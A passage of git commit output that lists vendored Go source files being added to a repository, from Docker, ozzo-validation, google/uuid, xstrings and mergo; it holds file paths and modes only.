 create mode 100644 vendor/github.com/docker/docker/pkg/platform/architecture_linux.go
 create mode 100644 vendor/github.com/docker/docker/pkg/platform/architecture_unix.go
 create mode 100644 vendor/github.com/docker/docker/pkg/platform/architecture_windows.go
 create mode 100644 vendor/github.com/docker/docker/pkg/platform/platform.go
 create mode 100644 vendor/github.com/docker/docker/pkg/platform/utsname_int8.go
 create mode 100644 vendor/github.com/docker/docker/pkg/platform/utsname_uint8.go
 create mode 100644 vendor/github.com/docker/docker/pkg/plugingetter/getter.go
 create mode 100644 vendor/github.com/docker/docker/pkg/plugins/client.go
 create mode 100644 vendor/github.com/docker/docker/pkg/plugins/client_test.go
 create mode 100644 vendor/github.com/docker/docker/pkg/plugins/discovery.go
 create mode 100644 vendor/github.com/docker/docker/pkg/plugins/discovery_test.go
 create mode 100644 vendor/github.com/docker/docker/pkg/plugins/discovery_unix.go
 create mode 100644 vendor/github.com/docker/docker/pkg/plugins/discovery_unix_test.go
 create mode 100644 vendor/github.com/docker/docker/pkg/plugins/discovery_windows.go
 create mode 100644 vendor/github.com/docker/docker/pkg/plugins/errors.go
 create mode 100644 vendor/github.com/docker/docker/pkg/plugins/plugin_test.go
 create mode 100644 vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/README.md
 create mode 100644 vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/fixtures/foo.go
 create mode 100644 vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/fixtures/otherfixture/spaceship.go
 create mode 100644 vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/main.go
 create mode 100644 vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/parser.go
 create mode 100644 vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/parser_test.go
 create mode 100644 vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/template.go
 create mode 100644 vendor/github.com/docker/docker/pkg/plugins/plugins.go
 create mode 100644 vendor/github.com/docker/docker/pkg/plugins/plugins_linux.go
 create mode 100644 vendor/github.com/docker/docker/pkg/plugins/plugins_windows.go
 create mode 100644 vendor/github.com/docker/docker/pkg/plugins/transport/http.go
 create mode 100644 vendor/github.com/docker/docker/pkg/plugins/transport/transport.go
 create mode 100644 vendor/github.com/docker/docker/pkg/pools/pools.go
 create mode 100644 vendor/github.com/docker/docker/pkg/pools/pools_test.go
 create mode 100644 vendor/github.com/docker/docker/pkg/progress/progress.go
 create mode 100644 vendor/github.com/docker/docker/pkg/progress/progressreader.go
 create mode 100644 vendor/github.com/docker/docker/pkg/progress/progressreader_test.go
 create mode 100644 vendor/github.com/docker/docker/pkg/promise/promise.go
 create mode 100644 vendor/github.com/docker/docker/pkg/pubsub/publisher.go
 create mode 100644 vendor/github.com/docker/docker/pkg/pubsub/publisher_test.go
 create mode 100644 vendor/github.com/docker/docker/pkg/random/random.go
 create mode 100644 vendor/github.com/docker/docker/pkg/random/random_test.go
 create mode 100644 vendor/github.com/docker/docker/pkg/reexec/README.md
 create mode 100644 vendor/github.com/docker/docker/pkg/reexec/command_linux.go
 create mode 100644 vendor/github.com/docker/docker/pkg/reexec/command_unix.go
 create mode 100644 vendor/github.com/docker/docker/pkg/reexec/command_unsupported.go
 create mode 100644 vendor/github.com/docker/docker/pkg/reexec/command_windows.go
 create mode 100644 vendor/github.com/docker/docker/pkg/reexec/reexec.go
 create mode 100644 vendor/github.com/docker/docker/pkg/registrar/registrar.go
 create mode 100644 vendor/github.com/docker/docker/pkg/registrar/registrar_test.go
 create mode 100644 vendor/github.com/docker/docker/pkg/signal/README.md
 create mode 100644 vendor/github.com/docker/docker/pkg/signal/signal.go
 create mode 100644 vendor/github.com/docker/docker/pkg/signal/signal_darwin.go
 create mode 100644 vendor/github.com/docker/docker/pkg/signal/signal_freebsd.go
 create mode 100644 vendor/github.com/docker/docker/pkg/signal/signal_linux.go
 create mode 100644 vendor/github.com/docker/docker/pkg/signal/signal_solaris.go
 create mode 100644 vendor/github.com/docker/docker/pkg/signal/signal_unix.go
 create mode 100644 vendor/github.com/docker/docker/pkg/signal/signal_unsupported.go
 create mode 100644 vendor/github.com/docker/docker/pkg/signal/signal_windows.go
 create mode 100644 vendor/github.com/docker/docker/pkg/signal/trap.go
 create mode 100644 vendor/github.com/docker/docker/pkg/stdcopy/stdcopy.go
 create mode 100644 vendor/github.com/docker/docker/pkg/stdcopy/stdcopy_test.go
 create mode 100644 vendor/github.com/docker/docker/pkg/streamformatter/streamformatter.go
 create mode 100644 vendor/github.com/docker/docker/pkg/streamformatter/streamformatter_test.go
 create mode 100644 vendor/github.com/docker/docker/pkg/stringid/README.md
 create mode 100644 vendor/github.com/docker/docker/pkg/stringid/stringid.go
 create mode 100644 vendor/github.com/docker/docker/pkg/stringid/stringid_test.go
 create mode 100644 vendor/github.com/docker/docker/pkg/stringutils/README.md
 create mode 100644 vendor/github.com/docker/docker/pkg/stringutils/stringutils.go
 create mode 100644 vendor/github.com/docker/docker/pkg/stringutils/stringutils_test.go
 create mode 100644 vendor/github.com/docker/docker/pkg/symlink/LICENSE.APACHE
 create mode 100644 vendor/github.com/docker/docker/pkg/symlink/LICENSE.BSD
 create mode 100644 vendor/github.com/docker/docker/pkg/symlink/README.md
 create mode 100644 vendor/github.com/docker/docker/pkg/symlink/fs.go
 create mode 100644 vendor/github.com/docker/docker/pkg/symlink/fs_unix.go
 create mode 100644 vendor/github.com/docker/docker/pkg/symlink/fs_unix_test.go
 create mode 100644 vendor/github.com/docker/docker/pkg/symlink/fs_windows.go
 create mode 100644 vendor/github.com/docker/docker/pkg/sysinfo/README.md
 create mode 100644 vendor/github.com/docker/docker/pkg/sysinfo/numcpu.go
 create mode 100644 vendor/github.com/docker/docker/pkg/sysinfo/numcpu_linux.go
 create mode 100644 vendor/github.com/docker/docker/pkg/sysinfo/numcpu_windows.go
 create mode 100644 vendor/github.com/docker/docker/pkg/sysinfo/sysinfo.go
 create mode 100644 vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_linux.go
 create mode 100644 vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_linux_test.go
 create mode 100644 vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_solaris.go
 create mode 100644 vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_test.go
 create mode 100644 vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_unix.go
 create mode 100644 vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_windows.go
 create mode 100644 vendor/github.com/docker/docker/pkg/system/chtimes.go
 create mode 100644 vendor/github.com/docker/docker/pkg/system/chtimes_test.go
 create mode 100644 vendor/github.com/docker/docker/pkg/system/chtimes_unix.go
 create mode 100644 vendor/github.com/docker/docker/pkg/system/chtimes_unix_test.go
 create mode 100644 vendor/github.com/docker/docker/pkg/system/chtimes_windows.go
 create mode 100644 vendor/github.com/docker/docker/pkg/system/chtimes_windows_test.go
 create mode 100644 vendor/github.com/docker/docker/pkg/system/errors.go
 create mode 100644 vendor/github.com/docker/docker/pkg/system/events_windows.go
 create mode 100644 vendor/github.com/docker/docker/pkg/system/exitcode.go
 create mode 100644 vendor/github.com/docker/docker/pkg/system/filesys.go
 create mode 100644 vendor/github.com/docker/docker/pkg/system/filesys_windows.go
 create mode 100644 vendor/github.com/docker/docker/pkg/system/lstat.go
 create mode 100644 vendor/github.com/docker/docker/pkg/system/lstat_unix_test.go
 create mode 100644 vendor/github.com/docker/docker/pkg/system/lstat_windows.go
 create mode 100644 vendor/github.com/docker/docker/pkg/system/meminfo.go
 create mode 100644 vendor/github.com/docker/docker/pkg/system/meminfo_linux.go
 create mode 100644 vendor/github.com/docker/docker/pkg/system/meminfo_solaris.go
 create mode 100644 vendor/github.com/docker/docker/pkg/system/meminfo_unix_test.go
 create mode 100644 vendor/github.com/docker/docker/pkg/system/meminfo_unsupported.go
 create mode 100644 vendor/github.com/docker/docker/pkg/system/meminfo_windows.go
 create mode 100644 vendor/github.com/docker/docker/pkg/system/mknod.go
 create mode 100644 vendor/github.com/docker/docker/pkg/system/mknod_windows.go
 create mode 100644 vendor/github.com/docker/docker/pkg/system/path_unix.go
 create mode 100644 vendor/github.com/docker/docker/pkg/system/path_windows.go
 create mode 100644 vendor/github.com/docker/docker/pkg/system/path_windows_test.go
 create mode 100644 vendor/github.com/docker/docker/pkg/system/stat.go
 create mode 100644 vendor/github.com/docker/docker/pkg/system/stat_darwin.go
 create mode 100644 vendor/github.com/docker/docker/pkg/system/stat_freebsd.go
 create mode 100644 vendor/github.com/docker/docker/pkg/system/stat_linux.go
 create mode 100644 vendor/github.com/docker/docker/pkg/system/stat_openbsd.go
 create mode 100644 vendor/github.com/docker/docker/pkg/system/stat_solaris.go
 create mode 100644 vendor/github.com/docker/docker/pkg/system/stat_unix_test.go
 create mode 100644 vendor/github.com/docker/docker/pkg/system/stat_unsupported.go
 create mode 100644 vendor/github.com/docker/docker/pkg/system/stat_windows.go
 create mode 100644 vendor/github.com/docker/docker/pkg/system/syscall_unix.go
 create mode 100644 vendor/github.com/docker/docker/pkg/system/syscall_windows.go
 create mode 100644 vendor/github.com/docker/docker/pkg/system/syscall_windows_test.go
 create mode 100644 vendor/github.com/docker/docker/pkg/system/umask.go
 create mode 100644 vendor/github.com/docker/docker/pkg/system/umask_windows.go
 create mode 100644 vendor/github.com/docker/docker/pkg/system/utimes_freebsd.go
 create mode 100644 vendor/github.com/docker/docker/pkg/system/utimes_linux.go
 create mode 100644 vendor/github.com/docker/docker/pkg/system/utimes_unix_test.go
 create mode 100644 vendor/github.com/docker/docker/pkg/system/utimes_unsupported.go
 create mode 100644 vendor/github.com/docker/docker/pkg/system/xattrs_linux.go
 create mode 100644 vendor/github.com/docker/docker/pkg/system/xattrs_unsupported.go
 create mode 100644 vendor/github.com/docker/docker/pkg/tailfile/tailfile.go
 create mode 100644 vendor/github.com/docker/docker/pkg/tailfile/tailfile_test.go
 create mode 100644 vendor/github.com/docker/docker/pkg/tarsum/builder_context.go
 create mode 100644 vendor/github.com/docker/docker/pkg/tarsum/builder_context_test.go
 create mode 100644 vendor/github.com/docker/docker/pkg/tarsum/fileinfosums.go
 create mode 100644 vendor/github.com/docker/docker/pkg/tarsum/fileinfosums_test.go
 create mode 100644 vendor/github.com/docker/docker/pkg/tarsum/tarsum.go
 create mode 100644 vendor/github.com/docker/docker/pkg/tarsum/tarsum_spec.md
 create mode 100644 vendor/github.com/docker/docker/pkg/tarsum/tarsum_test.go
 create mode 100644 vendor/github.com/docker/docker/pkg/tarsum/testdata/46af0962ab5afeb5ce6740d4d91652e69206fc991fd5328c1a94d364ad00e457/json
 create mode 100644 vendor/github.com/docker/docker/pkg/tarsum/testdata/46af0962ab5afeb5ce6740d4d91652e69206fc991fd5328c1a94d364ad00e457/layer.tar
 create mode 100644 vendor/github.com/docker/docker/pkg/tarsum/testdata/511136ea3c5a64f264b78b5433614aec563103b4d4702f3ba7d4d2698e22c158/json
 create mode 100644 vendor/github.com/docker/docker/pkg/tarsum/testdata/511136ea3c5a64f264b78b5433614aec563103b4d4702f3ba7d4d2698e22c158/layer.tar
 create mode 100644 vendor/github.com/docker/docker/pkg/tarsum/testdata/collision/collision-0.tar
 create mode 100644 vendor/github.com/docker/docker/pkg/tarsum/testdata/collision/collision-1.tar
 create mode 100644 vendor/github.com/docker/docker/pkg/tarsum/testdata/collision/collision-2.tar
 create mode 100644 vendor/github.com/docker/docker/pkg/tarsum/testdata/collision/collision-3.tar
 create mode 100644 vendor/github.com/docker/docker/pkg/tarsum/testdata/xattr/json
 create mode 100644 vendor/github.com/docker/docker/pkg/tarsum/testdata/xattr/layer.tar
 create mode 100644 vendor/github.com/docker/docker/pkg/tarsum/versioning.go
 create mode 100644 vendor/github.com/docker/docker/pkg/tarsum/versioning_test.go
 create mode 100644 vendor/github.com/docker/docker/pkg/tarsum/writercloser.go
 create mode 100644 vendor/github.com/docker/docker/pkg/term/ascii.go
 create mode 100644 vendor/github.com/docker/docker/pkg/term/ascii_test.go
 create mode 100644 vendor/github.com/docker/docker/pkg/term/tc_linux_cgo.go
 create mode 100644 vendor/github.com/docker/docker/pkg/term/tc_other.go
 create mode 100644 vendor/github.com/docker/docker/pkg/term/tc_solaris_cgo.go
 create mode 100644 vendor/github.com/docker/docker/pkg/term/term.go
 create mode 100644 vendor/github.com/docker/docker/pkg/term/term_solaris.go
 create mode 100644 vendor/github.com/docker/docker/pkg/term/term_unix.go
 create mode 100644 vendor/github.com/docker/docker/pkg/term/term_windows.go
 create mode 100644 vendor/github.com/docker/docker/pkg/term/termios_darwin.go
 create mode 100644 vendor/github.com/docker/docker/pkg/term/termios_freebsd.go
 create mode 100644 vendor/github.com/docker/docker/pkg/term/termios_linux.go
 create mode 100644 vendor/github.com/docker/docker/pkg/term/termios_openbsd.go
 create mode 100644 vendor/github.com/docker/docker/pkg/term/windows/ansi_reader.go
 create mode 100644 vendor/github.com/docker/docker/pkg/term/windows/ansi_writer.go
 create mode 100644 vendor/github.com/docker/docker/pkg/term/windows/console.go
 create mode 100644 vendor/github.com/docker/docker/pkg/term/windows/windows.go
 create mode 100644 vendor/github.com/docker/docker/pkg/term/windows/windows_test.go
 create mode 100644 vendor/github.com/docker/docker/pkg/testutil/assert/assert.go
 create mode 100644 vendor/github.com/docker/docker/pkg/testutil/pkg.go
 create mode 100644 vendor/github.com/docker/docker/pkg/testutil/tempfile/tempfile.go
 create mode 100644 vendor/github.com/docker/docker/pkg/tlsconfig/tlsconfig_clone.go
 create mode 100644 vendor/github.com/docker/docker/pkg/tlsconfig/tlsconfig_clone_go16.go
 create mode 100644 vendor/github.com/docker/docker/pkg/tlsconfig/tlsconfig_clone_go17.go
 create mode 100644 vendor/github.com/docker/docker/pkg/truncindex/truncindex.go
 create mode 100644 vendor/github.com/docker/docker/pkg/truncindex/truncindex_test.go
 create mode 100644 vendor/github.com/docker/docker/pkg/urlutil/urlutil.go
 create mode 100644 vendor/github.com/docker/docker/pkg/urlutil/urlutil_test.go
 create mode 100644 vendor/github.com/docker/docker/pkg/useragent/README.md
 create mode 100644 vendor/github.com/docker/docker/pkg/useragent/useragent.go
 create mode 100644 vendor/github.com/docker/docker/pkg/useragent/useragent_test.go
 create mode 100644 vendor/github.com/docker/docker/plugin/backend_linux.go
 create mode 100644 vendor/github.com/docker/docker/plugin/backend_unsupported.go
 create mode 100644 vendor/github.com/docker/docker/plugin/blobstore.go
 create mode 100644 vendor/github.com/docker/docker/plugin/defs.go
 create mode 100644 vendor/github.com/docker/docker/plugin/manager.go
 create mode 100644 vendor/github.com/docker/docker/plugin/manager_linux.go
 create mode 100644 vendor/github.com/docker/docker/plugin/manager_solaris.go
 create mode 100644 vendor/github.com/docker/docker/plugin/manager_windows.go
 create mode 100644 vendor/github.com/docker/docker/plugin/store.go
 create mode 100644 vendor/github.com/docker/docker/plugin/store_test.go
 create mode 100644 vendor/github.com/docker/docker/plugin/v2/plugin.go
 create mode 100644 vendor/github.com/docker/docker/plugin/v2/plugin_linux.go
 create mode 100644 vendor/github.com/docker/docker/plugin/v2/plugin_unsupported.go
 create mode 100644 vendor/github.com/docker/docker/plugin/v2/settable.go
 create mode 100644 vendor/github.com/docker/docker/plugin/v2/settable_test.go
 create mode 100644 vendor/github.com/docker/docker/poule.yml
 create mode 100644 vendor/github.com/docker/docker/profiles/apparmor/apparmor.go
 create mode 100644 vendor/github.com/docker/docker/profiles/apparmor/template.go
 create mode 100755 vendor/github.com/docker/docker/profiles/seccomp/default.json
 create mode 100755 vendor/github.com/docker/docker/profiles/seccomp/fixtures/example.json
 create mode 100644 vendor/github.com/docker/docker/profiles/seccomp/generate.go
 create mode 100644 vendor/github.com/docker/docker/profiles/seccomp/seccomp.go
 create mode 100644 vendor/github.com/docker/docker/profiles/seccomp/seccomp_default.go
 create mode 100644 vendor/github.com/docker/docker/profiles/seccomp/seccomp_test.go
 create mode 100644 vendor/github.com/docker/docker/profiles/seccomp/seccomp_unsupported.go
 create mode 100644 vendor/github.com/docker/docker/project/ARM.md
 create mode 100644 vendor/github.com/docker/docker/project/BRANCHES-AND-TAGS.md
 create mode 120000 vendor/github.com/docker/docker/project/CONTRIBUTORS.md
 create mode 100644 vendor/github.com/docker/docker/project/GOVERNANCE.md
 create mode 100644 vendor/github.com/docker/docker/project/IRC-ADMINISTRATION.md
 create mode 100644 vendor/github.com/docker/docker/project/ISSUE-TRIAGE.md
 create mode 100644 vendor/github.com/docker/docker/project/PACKAGE-REPO-MAINTENANCE.md
 create mode 100644 vendor/github.com/docker/docker/project/PACKAGERS.md
 create mode 100644 vendor/github.com/docker/docker/project/PATCH-RELEASES.md
 create mode 100644 vendor/github.com/docker/docker/project/PRINCIPLES.md
 create mode 100644 vendor/github.com/docker/docker/project/README.md
 create mode 100644 vendor/github.com/docker/docker/project/RELEASE-CHECKLIST.md
 create mode 100644 vendor/github.com/docker/docker/project/RELEASE-PROCESS.md
 create mode 100644 vendor/github.com/docker/docker/project/REVIEWING.md
 create mode 100644 vendor/github.com/docker/docker/project/TOOLS.md
 create mode 100644 vendor/github.com/docker/docker/reference/reference.go
 create mode 100644 vendor/github.com/docker/docker/reference/reference_test.go
 create mode 100644 vendor/github.com/docker/docker/reference/store.go
 create mode 100644 vendor/github.com/docker/docker/reference/store_test.go
 create mode 100644 vendor/github.com/docker/docker/registry/auth.go
 create mode 100644 vendor/github.com/docker/docker/registry/auth_test.go
 create mode 100644 vendor/github.com/docker/docker/registry/config.go
 create mode 100644 vendor/github.com/docker/docker/registry/config_test.go
 create mode 100644 vendor/github.com/docker/docker/registry/config_unix.go
 create mode 100644 vendor/github.com/docker/docker/registry/config_windows.go
 create mode 100644 vendor/github.com/docker/docker/registry/endpoint_test.go
 create mode 100644 vendor/github.com/docker/docker/registry/endpoint_v1.go
 create mode 100644 vendor/github.com/docker/docker/registry/registry.go
 create mode 100644 vendor/github.com/docker/docker/registry/registry_mock_test.go
 create mode 100644 vendor/github.com/docker/docker/registry/registry_test.go
 create mode 100644 vendor/github.com/docker/docker/registry/service.go
 create mode 100644 vendor/github.com/docker/docker/registry/service_v1.go
 create mode 100644 vendor/github.com/docker/docker/registry/service_v1_test.go
 create mode 100644 vendor/github.com/docker/docker/registry/service_v2.go
 create mode 100644 vendor/github.com/docker/docker/registry/session.go
 create mode 100644 vendor/github.com/docker/docker/registry/types.go
 create mode 100644 vendor/github.com/docker/docker/restartmanager/restartmanager.go
 create mode 100644 vendor/github.com/docker/docker/restartmanager/restartmanager_test.go
 create mode 100644 vendor/github.com/docker/docker/runconfig/compare.go
 create mode 100644 vendor/github.com/docker/docker/runconfig/compare_test.go
 create mode 100644 vendor/github.com/docker/docker/runconfig/config.go
 create mode 100644 vendor/github.com/docker/docker/runconfig/config_test.go
 create mode 100644 vendor/github.com/docker/docker/runconfig/config_unix.go
 create mode 100644 vendor/github.com/docker/docker/runconfig/config_windows.go
 create mode 100644 vendor/github.com/docker/docker/runconfig/errors.go
 create mode 100644 vendor/github.com/docker/docker/runconfig/fixtures/unix/container_config_1_14.json
 create mode 100644 vendor/github.com/docker/docker/runconfig/fixtures/unix/container_config_1_17.json
 create mode 100644 vendor/github.com/docker/docker/runconfig/fixtures/unix/container_config_1_19.json
 create mode 100644 vendor/github.com/docker/docker/runconfig/fixtures/unix/container_hostconfig_1_14.json
 create mode 100644 vendor/github.com/docker/docker/runconfig/fixtures/unix/container_hostconfig_1_19.json
 create mode 100644 vendor/github.com/docker/docker/runconfig/fixtures/windows/container_config_1_19.json
 create mode 100644 vendor/github.com/docker/docker/runconfig/hostconfig.go
 create mode 100644 vendor/github.com/docker/docker/runconfig/hostconfig_solaris.go
 create mode 100644 vendor/github.com/docker/docker/runconfig/hostconfig_test.go
 create mode 100644 vendor/github.com/docker/docker/runconfig/hostconfig_unix.go
 create mode 100644 vendor/github.com/docker/docker/runconfig/hostconfig_windows.go
 create mode 100644 vendor/github.com/docker/docker/runconfig/opts/envfile.go
 create mode 100644 vendor/github.com/docker/docker/runconfig/opts/envfile_test.go
 create mode 100755 vendor/github.com/docker/docker/runconfig/opts/fixtures/utf16.env
 create mode 100755 vendor/github.com/docker/docker/runconfig/opts/fixtures/utf16be.env
 create mode 100755 vendor/github.com/docker/docker/runconfig/opts/fixtures/utf8.env
 create mode 100644 vendor/github.com/docker/docker/runconfig/opts/fixtures/valid.env
 create mode 100644 vendor/github.com/docker/docker/runconfig/opts/fixtures/valid.label
 create mode 100644 vendor/github.com/docker/docker/runconfig/opts/opts.go
 create mode 100644 vendor/github.com/docker/docker/runconfig/opts/opts_test.go
 create mode 100644 vendor/github.com/docker/docker/runconfig/opts/parse.go
 create mode 100644 vendor/github.com/docker/docker/runconfig/opts/parse_test.go
 create mode 100644 vendor/github.com/docker/docker/runconfig/opts/runtime.go
 create mode 100644 vendor/github.com/docker/docker/runconfig/opts/throttledevice.go
 create mode 100644 vendor/github.com/docker/docker/runconfig/opts/ulimit.go
 create mode 100644 vendor/github.com/docker/docker/runconfig/opts/ulimit_test.go
 create mode 100644 vendor/github.com/docker/docker/runconfig/opts/weightdevice.go
 create mode 100644 vendor/github.com/docker/docker/utils/debug.go
 create mode 100644 vendor/github.com/docker/docker/utils/debug_test.go
 create mode 100644 vendor/github.com/docker/docker/utils/names.go
 create mode 100644 vendor/github.com/docker/docker/utils/process_unix.go
 create mode 100644 vendor/github.com/docker/docker/utils/process_windows.go
 create mode 100644 vendor/github.com/docker/docker/utils/templates/templates.go
 create mode 100644 vendor/github.com/docker/docker/utils/templates/templates_test.go
 create mode 100644 vendor/github.com/docker/docker/utils/utils.go
 create mode 100644 vendor/github.com/docker/docker/utils/utils_test.go
 create mode 100644 vendor/github.com/docker/docker/vendor.conf
 create mode 100644 vendor/github.com/docker/docker/volume/drivers/adapter.go
 create mode 100644 vendor/github.com/docker/docker/volume/drivers/extpoint.go
 create mode 100644 vendor/github.com/docker/docker/volume/drivers/extpoint_test.go
 create mode 100644 vendor/github.com/docker/docker/volume/drivers/proxy.go
 create mode 100644 vendor/github.com/docker/docker/volume/drivers/proxy_test.go
 create mode 100644 vendor/github.com/docker/docker/volume/local/local.go
 create mode 100644 vendor/github.com/docker/docker/volume/local/local_test.go
 create mode 100644 vendor/github.com/docker/docker/volume/local/local_unix.go
 create mode 100644 vendor/github.com/docker/docker/volume/local/local_windows.go
 create mode 100644 vendor/github.com/docker/docker/volume/store/db.go
 create mode 100644 vendor/github.com/docker/docker/volume/store/errors.go
 create mode 100644 vendor/github.com/docker/docker/volume/store/restore.go
 create mode 100644 vendor/github.com/docker/docker/volume/store/store.go
 create mode 100644 vendor/github.com/docker/docker/volume/store/store_test.go
 create mode 100644 vendor/github.com/docker/docker/volume/store/store_unix.go
 create mode 100644 vendor/github.com/docker/docker/volume/store/store_windows.go
 create mode 100644 vendor/github.com/docker/docker/volume/testutils/testutils.go
 create mode 100644 vendor/github.com/docker/docker/volume/validate.go
 create mode 100644 vendor/github.com/docker/docker/volume/validate_test.go
 create mode 100644 vendor/github.com/docker/docker/volume/validate_test_unix.go
 create mode 100644 vendor/github.com/docker/docker/volume/validate_test_windows.go
 create mode 100644 vendor/github.com/docker/docker/volume/volume.go
 create mode 100644 vendor/github.com/docker/docker/volume/volume_copy.go
 create mode 100644 vendor/github.com/docker/docker/volume/volume_copy_unix.go
 create mode 100644 vendor/github.com/docker/docker/volume/volume_copy_windows.go
 create mode 100644 vendor/github.com/docker/docker/volume/volume_linux.go
 create mode 100644 vendor/github.com/docker/docker/volume/volume_linux_test.go
 create mode 100644 vendor/github.com/docker/docker/volume/volume_propagation_linux.go
 create mode 100644 vendor/github.com/docker/docker/volume/volume_propagation_linux_test.go
 create mode 100644 vendor/github.com/docker/docker/volume/volume_propagation_unsupported.go
 create mode 100644 vendor/github.com/docker/docker/volume/volume_test.go
 create mode 100644 vendor/github.com/docker/docker/volume/volume_unix.go
 create mode 100644 vendor/github.com/docker/docker/volume/volume_unsupported.go
 create mode 100644 vendor/github.com/docker/docker/volume/volume_windows.go
 create mode 100644 vendor/github.com/go-ozzo/ozzo-validation/.gitignore
 create mode 100644 vendor/github.com/go-ozzo/ozzo-validation/.travis.yml
 create mode 100644 vendor/github.com/go-ozzo/ozzo-validation/LICENSE
 create mode 100644 vendor/github.com/go-ozzo/ozzo-validation/README.md
 create mode 100644 vendor/github.com/go-ozzo/ozzo-validation/UPGRADE.md
 create mode 100644 vendor/github.com/go-ozzo/ozzo-validation/date.go
 create mode 100644 vendor/github.com/go-ozzo/ozzo-validation/date_test.go
 create mode 100644 vendor/github.com/go-ozzo/ozzo-validation/error.go
 create mode 100644 vendor/github.com/go-ozzo/ozzo-validation/error_test.go
 create mode 100644 vendor/github.com/go-ozzo/ozzo-validation/example_test.go
 create mode 100644 vendor/github.com/go-ozzo/ozzo-validation/in.go
 create mode 100644 vendor/github.com/go-ozzo/ozzo-validation/in_test.go
 create mode 100644 vendor/github.com/go-ozzo/ozzo-validation/is/rules.go
 create mode 100644 vendor/github.com/go-ozzo/ozzo-validation/is/rules_test.go
 create mode 100644 vendor/github.com/go-ozzo/ozzo-validation/length.go
 create mode 100644 vendor/github.com/go-ozzo/ozzo-validation/length_test.go
 create mode 100644 vendor/github.com/go-ozzo/ozzo-validation/match.go
 create mode 100644 vendor/github.com/go-ozzo/ozzo-validation/match_test.go
 create mode 100644 vendor/github.com/go-ozzo/ozzo-validation/minmax.go
 create mode 100644 vendor/github.com/go-ozzo/ozzo-validation/minmax_test.go
 create mode 100644 vendor/github.com/go-ozzo/ozzo-validation/not_nil.go
 create mode 100644 vendor/github.com/go-ozzo/ozzo-validation/not_nil_test.go
 create mode 100644 vendor/github.com/go-ozzo/ozzo-validation/required.go
 create mode 100644 vendor/github.com/go-ozzo/ozzo-validation/required_test.go
 create mode 100644 vendor/github.com/go-ozzo/ozzo-validation/string.go
 create mode 100644 vendor/github.com/go-ozzo/ozzo-validation/string_test.go
 create mode 100644 vendor/github.com/go-ozzo/ozzo-validation/struct.go
 create mode 100644 vendor/github.com/go-ozzo/ozzo-validation/struct_test.go
 create mode 100644 vendor/github.com/go-ozzo/ozzo-validation/util.go
 create mode 100644 vendor/github.com/go-ozzo/ozzo-validation/util_test.go
 create mode 100644 vendor/github.com/go-ozzo/ozzo-validation/validation.go
 create mode 100644 vendor/github.com/go-ozzo/ozzo-validation/validation_test.go
 create mode 100644 vendor/github.com/google/uuid/.travis.yml
 create mode 100644 vendor/github.com/google/uuid/CONTRIBUTING.md
 create mode 100644 vendor/github.com/google/uuid/CONTRIBUTORS
 create mode 100644 vendor/github.com/google/uuid/LICENSE
 create mode 100644 vendor/github.com/google/uuid/README.md
 create mode 100644 vendor/github.com/google/uuid/dce.go
 create mode 100644 vendor/github.com/google/uuid/doc.go
 create mode 100644 vendor/github.com/google/uuid/hash.go
 create mode 100644 vendor/github.com/google/uuid/json_test.go
 create mode 100644 vendor/github.com/google/uuid/marshal.go
 create mode 100644 vendor/github.com/google/uuid/node.go
 create mode 100644 vendor/github.com/google/uuid/seq_test.go
 create mode 100644 vendor/github.com/google/uuid/sql.go
 create mode 100644 vendor/github.com/google/uuid/sql_test.go
 create mode 100644 vendor/github.com/google/uuid/time.go
 create mode 100644 vendor/github.com/google/uuid/util.go
 create mode 100644 vendor/github.com/google/uuid/uuid.go
 create mode 100644 vendor/github.com/google/uuid/uuid_test.go
 create mode 100644 vendor/github.com/google/uuid/version1.go
 create mode 100644 vendor/github.com/google/uuid/version4.go
 create mode 100644 vendor/github.com/huandu/xstrings/.gitignore
 create mode 100644 vendor/github.com/huandu/xstrings/.travis.yml
 create mode 100644 vendor/github.com/huandu/xstrings/CONTRIBUTING.md
 create mode 100644 vendor/github.com/huandu/xstrings/LICENSE
 create mode 100644 vendor/github.com/huandu/xstrings/README.md
 create mode 100644 vendor/github.com/huandu/xstrings/common.go
 create mode 100644 vendor/github.com/huandu/xstrings/convert.go
 create mode 100644 vendor/github.com/huandu/xstrings/convert_test.go
 create mode 100644 vendor/github.com/huandu/xstrings/count.go
 create mode 100644 vendor/github.com/huandu/xstrings/count_test.go
 create mode 100644 vendor/github.com/huandu/xstrings/doc.go
 create mode 100644 vendor/github.com/huandu/xstrings/format.go
 create mode 100644 vendor/github.com/huandu/xstrings/format_test.go
 create mode 100644 vendor/github.com/huandu/xstrings/manipulate.go
 create mode 100644 vendor/github.com/huandu/xstrings/manipulate_test.go
 create mode 100644 vendor/github.com/huandu/xstrings/translate.go
 create mode 100644 vendor/github.com/huandu/xstrings/translate_test.go
 create mode 100644 vendor/github.com/huandu/xstrings/util_test.go
 create mode 100644 vendor/github.com/imdario/mergo/.gitignore
 create mode 100644 vendor/github.com/imdario/mergo/.travis.yml
 create mode 100644 vendor/github.com/imdario/mergo/CODE_OF_CONDUCT.md
 create mode 100644 vendor/github.com/imdario/mergo/LICENSE
 create mode 100644 vendor/github.com/imdario/mergo/README.md
 create mode 100644 vendor/github.com/imdario/mergo/doc.go
 create mode 100644 vendor/github.com/imdario/mergo/issue17_test.go
 create mode 100644 vendor/github.com/imdario/mergo/issue23_test.go
 create mode 100644 vendor/github.com/imdario/mergo/issue33_test.go
 create mode 100644 vendor/github.com/imdario/mergo/issue38_test.go
 create mode 100644 vendor/github.com/imdario/mergo/issue50_test.go
 create mode 100644 vendor/github.com/imdario/mergo/issue52_test.go
 create mode 100644 vendor/github.com/imdario/mergo/issue61_test.go
 create mode 100644 vendor/github.com/imdario/mergo/issue64_test.go
 create mode 100644 vendor/github.com/imdario/mergo/issue66_test.go
 create mode 100644 vendor/github.com/imdario/mergo/map.go
 create mode 100644 vendor/github.com/imdario/mergo/merge.go
 create mode 100644 vendor/github.com/imdario/mergo/merge_appendslice_test.go
 create mode 100644 vendor/github.com/imdario/mergo/merge_test.go
